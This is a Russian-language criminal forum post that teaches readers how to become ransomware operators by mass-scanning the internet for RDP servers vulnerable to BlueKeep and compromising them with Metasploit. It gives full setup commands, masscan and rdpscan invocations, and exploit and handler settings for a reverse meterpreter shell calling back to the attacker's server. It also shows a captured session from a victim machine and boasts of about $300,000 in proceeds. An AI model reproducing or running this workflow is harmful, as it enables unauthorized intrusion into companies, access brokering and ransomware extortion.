Добываем доступы в корпы через паблик RCE

D2

Администратор
Регистрация
19 Фев 2025
Сообщения
4,380
Реакции
0
Как заработать от 1к до 100к баксов за месяц почти без вложений?

Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту

Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)

Обновим пакеты
sudo apt-get update

Накатим xrdp для работы через терминальные сессии

sudo apt-get install xrdp

Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)

sudo apt-get install xfce4 xfce4-terminal

Разрешим xrdp исользовать эту оболчку

sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh

Включаем xrpd

Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)


sudo systemctl enable xrdp


Done теперь вы можете работать с сервером через терминальную сессию


поставим удобный текстовый редактор gedit

sudo apt-get install gedit


Поставим htop для мониторинга загруженности системы

sudo apt-get install htop


Установка metasploit, БД к нему подтягивать не будем она не понадобиться


качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

даем права chmod 755 msfinstall

sudo ./msfinstall


Теперь при наборе msfconsole в шелле метасплойт запуститься.

II выбор RCE и подготовка материала

Добывать свой хлеб мы будем данной уязвимостью

xttps://en.wikipedia.org/wiki/BlueKeep

в метасплойте есть rce для него

exploit/windows/rdp/cve_2019_0708_bluekeep_rce


Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)

С RCE мы определились

теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип

В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп

лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп

Я покажу на примере стандандартного 3389 порта


Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep

ставим все не обходимое для работы масскана sudo apt-get install git gcc make libpcap-dev
затягиваем сорсы к себе git clone https://github.com/robertdavidgraham/masscan
переходим в каталог с массканом cd masscan
собираем в многопотоке make -j

Качаем бесплатно либо покупаем депы IP адресов


masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть

awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt

выдаст чистые результаты IP с output фаила масскана


Ставим сканер на уязвимость блюкип и все необходимо для его работы

sudo apt-get install libssl-dev sudo apt-get install build-essential

git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
компилируем make -j

Запуск сканера

./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt

--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )

--port 3389 порт который сканируем

--file /root/rdpscan/ch2.txt путь до фаила с ипами

grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt

III получаем доступы

Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер


и так запускаем метасплойт

msfconsole


И сразу открываем второе окно терминала и там опять запускаем метасплойт


В первом окне делаем handler (туда будут лететь сессии отдельным окном)

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp_rc4 (выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )
set EXITFUNC thread
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.

set LHOST хост нашей впс
set LPORT порт где будет висит слушатель
set RC4PASSWORD PASSS ( пароль для RC4)
set ExitOnSession 0 (данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))
setg SessionLogging y включить логирование
setg loglevel 1 уровень логирования
run -j запуск

хэндлер готов и ожидает коннектов

переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp_rc4
set EXITFUNC thread
set DisablePayloadHandler 1 (обязтаельно 1 что бы сесия летела в отдельное окно)
set LHOST ип впс
set LPORT порт (указывать такой же как и в хэндлере)
set RC4PASSWORD PASSS (пароль такой же как в хэндлере)
set ConnectTimeout 5 (таймаут)
set GROOMSIZE 100 (количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машины
set GROOMCHANNELCOUNT 1
set forceexploit 1 исполнять принудетельно
set target 1 (дефолтный таргет тут менять ничего не нужно )
set rhosts file:/root/rdpscan/4.txt (путь до фаила с уязмимыми машинами)
set RPORT (если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)
run - запуск

через какое то время в хендлер полетят сесии


Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows

Вам остается только закрепляться и отбирать доступы)

Enjoy

c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы
 
Сверху Снизу